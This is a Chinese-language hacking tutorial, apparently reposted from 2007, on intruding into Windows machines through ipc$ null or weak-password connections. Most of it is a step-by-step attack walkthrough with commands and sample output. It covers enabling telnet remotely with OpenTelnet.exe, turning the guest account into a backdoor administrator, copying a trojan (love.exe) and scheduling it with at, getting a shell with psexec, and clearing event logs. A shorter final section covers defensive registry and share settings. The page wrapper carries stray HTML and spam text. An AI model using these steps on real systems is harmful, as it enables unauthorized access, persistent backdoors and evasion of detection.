• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 菜鳥必備:ipc$詳細解

    發表于:2007-06-23來源:作者:點擊數: 標簽:
    十 一些需要shell才能完成的命令 看到很多教程這方面寫的十分不準確,一些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了,起了誤導作用。那么下面我總結一下需要在shell才能完成的命令: 1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組

       
      十 一些需要shell才能完成的命令
      
      看到很多教程這方面寫的十分不準確,一些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了,起了誤導作用。那么下面我總結一下需要在shell才能完成的命令:
      

      1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在shell下完成;
      
      2 打開遠程主機的ipc$共享,默認共享,普通共享的操作需要在shell下完成;
      
      3 運行/關閉遠程主機的服務,需要在shell下完成;
      
      4 啟動/殺掉遠程主機的進程,也需要在shell下完成。
      
      十一 入侵中可能會用到的相關命令
      
      請注意命令適用于本地還是遠程,如果適用于本地,你只能在獲得遠程主機的shell后,才能向遠程主機執行。
      
      1 建立空連接:
      net use \IPipc$ "" /user:""
      
      2 建立非空連接:
      net use \IPipc$ "psw" /user:"aclearcase/" target="_blank" >ccount"
      
      3 查看遠程主機的共享資源(但看不到默認共享)
      net view \IP
      
      4 查看本地主機的共享資源(可以看到本地的默認共享)
      net share
      
      5 得到遠程主機的用戶名列表
      nbtstat -A IP
      
      6 得到本地主機的用戶列表
      net user
      
      7 查看遠程主機的當前時間
      net time \IP
      
      8 顯示本地主機當前服務
      net start
      
      9 啟動/關閉本地服務
      net start 服務名 /y
      net stop 服務名 /y
      
      10 映射遠程共享:
      net use z: \IPaby
      此命令將共享名為baby的共享資源映射到z盤
      
      11 刪除共享映射
      net use c: /del 刪除映射的c盤,其他盤類推
      net use * /del /y刪除全部
      
      12 向遠程主機復制文件
      copy 路徑srv.exe \IP共享目錄名,如:
      copy ccbirds.exe \*.*.*.*c 即將當前目錄下的文件復制到對方c盤內
      
      13 遠程添加計劃任務
      at \ip 時間 程序名,如:
      at \127.0.0.0 11:00 love.exe
      注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
      
      14 開啟遠程主機的telnet
      這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:
      
      1)目標開啟了ipc$共享
      2)你要擁有管理員密碼和帳號
      3)目標開啟RemoteRegistry服務,用戶就該ntlm認證
      4)對WIN2K/XP有效,NT未經測試
      命令格式:OpenTelnet.exe \server account psw NTLM認證方式 port
      試例如下:c:>OpenTelnet.exe \*.*.*.* administrator "" 1 90
      
      15 激活用戶/加入管理員組
      1 net uesr account /active:yes
      2 net localgroup administrators account /add
      
      16 關閉遠程主機的telnet
      同樣需要一個小程序:ResumeTelnet.exe
      命令格式:ResumeTelnet.exe \server account psw
      試例如下:c:>ResumeTelnet.exe \*.*.*.* administrator ""
      
      17 刪除一個已建立的ipc$連接
      net use \IPipc$ /del
      
      十二 ipc$完整入侵步驟祥解
      
      其實入侵步驟隨個人愛好有所不同,我就說一下常見的吧,呵呵,獻丑了!
      
      1 用掃描軟件搜尋存在若口令的主機,比如流光,SSS,X-scan等,隨你的便,然后鎖定目標,如果掃到了管理員權限的口令,你可以進行下面的步驟了,假設你現在得到了administrator的密碼為空
      
      2 此時您有兩條路可以選擇:要么給對方開telnet(命令行),要么給它傳木馬(圖形界面),那我們就先走telnet這條路吧
      
      3上面開telnet的命令沒忘吧,要用到opentelnet這個小程序
      c:>OpenTelnet.exe \192.168.21.* administrator "" 1 90
      如果返回如下信息
      *******************************************************
      Remote Telnet Configure, by refdom
      Email: refdom@263.net
      OpenTelnet.exe
      
      Usage:OpenTelnet.exe \server username password NTLMAuthor telnetport
      *******************************************************
      Connecting \192.168.21.*...Successfully!
      
      NOTICE!!!!!!
      The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
      
      Starting telnet service...
      telnet service is started successfully! telnet service is running!
      
      BINGLE!!!Yeah!!
      Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
      Disconnecting server...Successfully!
      *說明你已經打開了一個端口90的telnet。
      
      4 現在我們telnet上去
      telnet 192.168.21.* 90
      如果成功,你將獲得遠程主機的一個shell,此時你可以像控制自己的機器一樣控制你的肉雞了,那么做點什么呢?把guest激活再加入管理組吧,就算留個后門了
      
      5 C:>net user guest /active:yes
      *將Guest用戶激活,也有可能人家的guest本來就試活的,你可以用net user guest看一下它的帳戶啟用的值是yes還是no
      
      6 C:>net user guest 1234
      *將Guest的密碼改為1234,或者改成你喜歡的密碼
      
      7 C:>net localgroup administrators guest /add
      *將Guest變為Administrator,這樣,即使以后管理員更改了他的密碼,我們也可以用guest登錄了,不過也要提醒您,因為通過安全策略的設置,可以禁止guest等帳戶的遠程訪問,呵呵,如果真是這樣,那我們的后門也就白做了,愿上帝保佑Guest。
      
      8 好了,現在我們來走另一條路,給它傳個木馬玩玩
      
      9 首先,我們先建立起ipc$連接
      C:>net use \192.168.21.*ipc$ "" /user:administrator
      
      10 既然要上傳東西,就要先知道它開了什么共享
      C:>net view \192.168.21.*
      在 \192.168.21.*的共享資源
      資源共享名 類型 用途 注釋
      
      C Disk
      D Disk
      命令成功完成。
      *好了,我們看到對方共享了C,D兩個盤,我們下面就可以向任意一個盤復制文件了。再次聲明,因為用net view命令無法看到默認共享,因此通過上面返回的結果,我們并不能判斷對方是否開啟了默認共享。
      
      11 C:>copy love.exe \192.168.21.*c
      已復制 1 個文件
      *用這個命令你可以將木馬客戶端love.exe傳到對方的c盤下,當然,如果能復制到系統文件夾下是最好的了,不容易被發現
      
      12 運行木馬前,我們先看看它現在的時間
      net time \192.168.21.*
      \192.168.21.*的當前時間是 2003/8/22 上午 11:00
      命令成功完成
      
      13 現在我們用at運行它吧,不過對方一定要開了Task Scheduler服務(允許程序在指定時間運行),否則就不行了
      C:>at \192.168.21.* 11:02 c:love.exe
      新加了一項作業,其作業 ID = 1
      
      14 剩下就是等了,等過了11:02,你就可以用控制端去連接了,如果成功你將可以用圖形界面去控制遠程主機了,如果連接失敗,那么它可能在局域網里,也可能程序被防火墻殺了,還可能它下線了(沒這么巧吧),無論哪種情況你只好放棄了
      
      嗯,好了,兩種基本方法都講了。如果你對上面的操作已經輕車熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec執行木馬,用命令:psexec \tergetIP -u user -p paswd cmd.exe直接獲得shell等,這些都是可以得,隨你的便。不過最后不要忘了把日志清理干凈,可以用榕哥的elsave.exe。
      講了ipc$的入侵,就不能不說如何防范,那么具體要怎樣做呢?看下面
      
      十三 如何防范ipc$入侵
      
      1 禁止空連接進行枚舉(此操作并不能阻止空連接的建立)
      
      方法1:
      運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous = DWORD的鍵值改為:1
      如果設置為"1",一個匿名用戶仍然可以連接到IPC$共享,但限制通過這種連接得到列舉SAM帳號和共享等信息;在Windows 2000 中增加了"2",限制所有匿名訪問除非特別授權,如果設置為2的話,可能會有一些其他問題發生,建議設置為1。如果上面所說的主鍵不存在,就新建一個再改鍵值。
      
      方法2:
      在本地安全設置-本地策略-安全選項-在'對匿名連接的額外限制'中做相應設置
      
      2 禁止默認共享
      
      1)察看本地共享資源
      運行-cmd-輸入net share
      
      2)刪除共享(重起后默認共享仍然存在)
      net share ipc$ /delete
      net share admin$ /delete
      net share c$ /delete
      net share d$ /delete(如果有e,f,……可以繼續刪除)
      
      3)停止server服務
      net stop server /y (重新啟動后server服務會重新開啟)
      
      4)禁止自動打開默認共享(此操作并未關閉ipc$共享)
      運行-regedit
      
      server版:找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
      
      pro版:找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的鍵值改為:00000000

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>